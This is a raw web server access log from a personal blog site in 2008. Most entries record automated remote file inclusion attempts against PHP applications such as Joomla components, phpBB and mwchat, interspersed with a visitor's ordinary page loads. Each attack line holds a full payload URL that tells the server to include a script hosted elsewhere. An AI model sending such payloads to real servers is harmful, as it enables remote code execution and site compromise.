203.166.160.152 - - [12/Sep/2008:10:53:14 -0700] "GET /logs/access_080615.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:53:14 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:53:18 -0700] "GET /logs/access_080331.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.251.74.140 - - [12/Sep/2008:10:53:20 -0700] "GET /logs/access_080331.log/?_zb_path=http://lnx.padellino.com/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
189.20.85.34 - - [12/Sep/2008:10:53:20 -0700] "GET /logs/access_080224.log/popup.php?path=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.20.85.34 - - [12/Sep/2008:10:53:21 -0700] "GET /popup.php?path=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
189.20.85.34 - - [12/Sep/2008:10:53:22 -0700] "GET /logs/popup.php?path=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.147.236.10 - - [12/Sep/2008:10:53:22 -0700] "GET /logs/access_080224.log/popup.php?path=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.147.236.10 - - [12/Sep/2008:10:53:23 -0700] "GET /popup.php?path=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.147.236.10 - - [12/Sep/2008:10:53:23 -0700] "GET /logs/popup.php?path=http://www.satinvestigacion.net/foro5/includes/TT?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:53:48 -0700] "GET /logs/access_080425.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:53:48 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:53:52 -0700] "GET /logs/access_080425.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:53:52 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:53:57 -0700] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:02 -0700] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
92.51.145.83 - - [12/Sep/2008:10:54:04 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:54:04 -0700] "GET /logs/access_080611.log/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
92.51.145.83 - - [12/Sep/2008:10:54:04 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:54:04 -0700] "GET /logs/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:54:05 -0700] "GET /logs/access_080512.log/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
92.51.145.83 - - [12/Sep/2008:10:54:05 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
92.51.145.83 - - [12/Sep/2008:10:54:05 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.34.17.159 - - [12/Sep/2008:10:54:05 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 200 89469 "-" "libwww-perl/5.810" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:43 -0700] "GET /logs/access_080425.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:43 -0700] "GET /logs/access_080425.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:44 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:44 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:44 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:44 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:45 -0700] "GET /logs/access_080425.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:45 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:54:45 -0700] "GET /logs/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:54:45 -0700] "GET /logs/access_080611.log/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:46 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:54:46 -0700] "GET /logs/access_080512.log/index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
64.72.112.158 - - [12/Sep/2008:10:54:46 -0700] "GET /index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://ownedyoubox.t35.com/idr0x.txt?%0D?? HTTP/1.1" 200 89469 "-" "libwww-perl/5.800" "www.dmulk.com"
222.231.24.38 - - [12/Sep/2008:10:54:48 -0700] "GET /index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89392 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:49 -0700] "GET /logs/access_080425.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:49 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:50 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:53 -0700] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:53 -0700] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.39.5.203 - - [12/Sep/2008:10:54:55 -0700] "GET /logs/access_080417.log/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://bbwonlinepersonals.com/groups/gallery/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:58 -0700] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:54:58 -0700] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:54:59 -0700] "GET /blog/ HTTP/1.1" 200 88743 "http://images.google.com/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1129.JPG&imgrefurl=http://dmulk.com/blog/&h=3888&w=2592&sz=3750&hl=de&start=6&um=1&usg=__jUmchYEyQYXSAjUuSPEuUWBjyNw=&tbnid=LYCVZVbLsBpfNM:&tbnh=150&tbnw=100&prev=/images%3Fq%3Dzumo%2Beating%26um%3D1%26hl%3Dde%26client%3Dsafari%26rls%3Dde-de%26sa%3DN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:54:59 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:54:59 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:54:59 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:54:59 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
124.217.248.246 - - [12/Sep/2008:10:55:03 -0700] "GET /logs/access_080710.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.freeimagehosting.net/uploads/02e684a7d5.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.248.246 - - [12/Sep/2008:10:55:03 -0700] "GET /logs/access_080710.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.freeimagehosting.net/uploads/80cdf06d77.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:55:13 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 3839261 "http://images.google.com/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1129.JPG&imgrefurl=http://dmulk.com/blog/&h=3888&w=2592&sz=3750&tbnid=LYCVZVbLsBpfNM:&tbnh=150&tbnw=100&hl=de&um=1&prev=/images%3Fq%3Dzumo%2Beating%26um%3D1%26hl%3Dde%26client%3Dsafari%26rls%3Dde-de%26sa%3DN&frame=small" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:55:14 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "http://dmulk.com/blog/wp-content/uploads/2008/04/img_1129.JPG" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:55:17 -0700] "GET /blog/ HTTP/1.1" 200 88759 "http://images.google.com/imgres?imgurl=http://dmulk.com/blog/wp-content/uploads/2008/04/img_1129.JPG&imgrefurl=http://dmulk.com/blog/&h=3888&w=2592&sz=3750&hl=de&start=6&um=1&usg=__jUmchYEyQYXSAjUuSPEuUWBjyNw=&tbnid=LYCVZVbLsBpfNM:&tbnh=150&tbnw=100&prev=/images%3Fq%3Dzumo%2Beating%26um%3D1%26hl%3Dde%26client%3Dsafari%26rls%3Dde-de%26sa%3DN" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:55:18 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:55:19 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:55:19 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:55:20 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:55:20 -0700] "GET /blog/wp-content/gallery/occ-hondas-2008/d68d_2.jpg HTTP/1.1" 200 6928 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:55:20 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:55:20 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:55:21 -0700] "GET /blog/wp-includes/images/smilies/icon_smile.gif HTTP/1.1" 200 174 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:55:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/westoc2008.jpg HTTP/1.1" 200 232814 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:55:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-002.jpg HTTP/1.1" 200 196608 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
88.73.111.52 - - [12/Sep/2008:10:55:21 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-008.jpg HTTP/1.1" 200 196608 "http://dmulk.com/blog/" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_4_11; de-de) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.2 Safari/525.22" "dmulk.com"
64.22.89.194 - - [12/Sep/2008:10:55:22 -0700] "GET /logs/access_080127.log/convert/mvcw.php?step=1&vwar_root=http://ideaindustry.us/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:10:55:22 -0700] "GET /convert/mvcw.php?step=1&vwar_root=http://ideaindustry.us/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:10:55:22 -0700] "GET /logs/convert/mvcw.php?step=1&vwar_root=http://ideaindustry.us/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
129.142.67.13 - - [12/Sep/2008:10:55:42 -0700] "GET /logs/access_080616.log/index.php?option=com_weblinks&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:55:47 -0700] "GET /logs/access_080425.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:55:47 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:55:48 -0700] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:55:50 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:55:52 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:55:52 -0700] "GET /logs/access_080403.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.169.167.106 - - [12/Sep/2008:10:55:53 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 200 3711 "-" "libwww-perl/5.803" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:56:00 -0700] "GET /logs/access_080209.log/index.php?lang=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:56:00 -0700] "GET /logs/index.php?lang=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:00 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:00 -0700] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:56:01 -0700] "GET /index.php?lang=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 200 89193 "-" "libwww-perl/5.805" "www.dmulk.com"
207.44.236.14 - - [12/Sep/2008:10:56:08 -0700] "GET /logs/access_080130.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.236.14 - - [12/Sep/2008:10:56:08 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.44.236.14 - - [12/Sep/2008:10:56:12 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:14 -0700] "GET /logs/access_080513.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.22.89.194 - - [12/Sep/2008:10:56:18 -0700] "GET /logs/access_080114.log/convert/mvcw.php?step=1&vwar_root=http://ideaindustry.us/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
203.166.160.152 - - [12/Sep/2008:10:56:18 -0700] "GET /logs/access_070724.log/index.php?lang=http://www.datadandy.net/backend/plugins/aria777.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.234.16.214 - - [12/Sep/2008:10:56:20 -0700] "GET /logs/access_080218.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.joomlalecce.com/andrea/tondo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [12/Sep/2008:10:56:21 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.joomlalecce.com/andrea/tondo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.234.16.214 - - [12/Sep/2008:10:56:21 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.joomlalecce.com/andrea/tondo/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:26 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:26 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:26 -0700] "GET /logs/access_080606.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.11.67.242 - - [12/Sep/2008:10:56:26 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.beschorner86.de/cms//modules/cmd/cid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
